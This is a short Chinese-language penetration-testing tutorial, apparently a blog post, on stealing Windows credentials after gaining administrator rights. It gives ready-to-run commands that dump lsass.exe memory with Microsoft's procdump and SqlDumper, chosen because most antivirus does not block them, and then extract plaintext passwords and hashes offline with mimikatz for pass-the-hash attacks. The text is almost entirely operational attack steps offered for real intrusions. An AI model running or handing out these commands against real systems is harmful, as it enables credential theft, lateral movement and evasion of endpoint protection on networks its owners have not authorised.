前言
内网渗透时,获得主机管理员权限后,通常会抓取用户的明文密码或hash,进行pth攻击。
大部分情况会遇到防护软件,常规抓取方法失效,因此需要对防护进行绕过。
Procdump.exe
Procdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。
首先使用procdump.exe把进程lsass.exe 的内存dump下来
procdump.exe -accepteula -ma lsass.exe lsass.dmp
实战中把 lsass.dmp 下载下来,在相同版本的操作系统使用mimikatz读取密码hash。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
SqlDumper.exe
SqlDumper也属于微软出品,存在于SQL Server文件夹中,大多数杀软不会拦截。
默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本。
如果目标机器没有安装SQL Server,可以自己上传SqlDumper.exe。
tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID号 Sqldumper.exe ProcessID 0 0x01100 导出mdmp文件
实战中下把生成的mdmp文件下载到本地,使用相同的操作系统打开。
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
79736 篇文章